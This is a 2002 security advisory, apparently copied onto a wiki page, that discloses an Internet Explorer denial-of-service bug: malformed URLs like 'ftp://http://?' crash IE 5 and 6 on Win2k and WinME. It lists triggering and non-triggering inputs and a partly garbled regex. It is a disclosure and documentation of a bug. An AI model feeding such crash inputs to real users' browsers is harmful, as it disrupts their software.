FANDOM


Net Force Security Advisory IEbug-1:

http://www.net-force.nl/IEbugs/IEbug-1.txt

http://www.net-force.nl/index.php?page=advisories.php&action=show&id=3

December 01, 2002



Bugs foundРедактиране

Internet Explorer DoS

Vulnerable version(only tested on them)Редактиране

- Win2k Internet Explorer version 6.0

- Win2k Internet Explorer version 5.0

- WinME Internet Explorer version 6.0

- WinME Internet Explorer version 5.5

Details - Internet Explorer DoSРедактиране

Internet Explorer can`t handle inserting certain characters and will crash. After inserting the following code, IE will send the 'Microsoft Internet Explorer has encountered a problem and need to be closed' window.

ftp://http://?

Check out the screenshot below for more details: http://www.net-force.nl/IEbugs/ScreenShotCrash.gif

We tested the bug a bit more and this does work:

ftp://http://?

ftp://a://?

ftp://anythingyyouwant://?

ftp://blahblahblah://blahblahblah?


This does not work:

ftp://://?

ftp://a//?

http://ftp://?

ftp://?://

ftp://blahblahblah:blahblahblah//blahblahblah?


That means, it has to match this RegEx

m�ftp://.+://.*\?�


CreditsРедактиране

BasTijs (bastijs at net-force.nl) - http://www.net-force.nl ps (ps at topgamers.net) - http://ha-boerse.net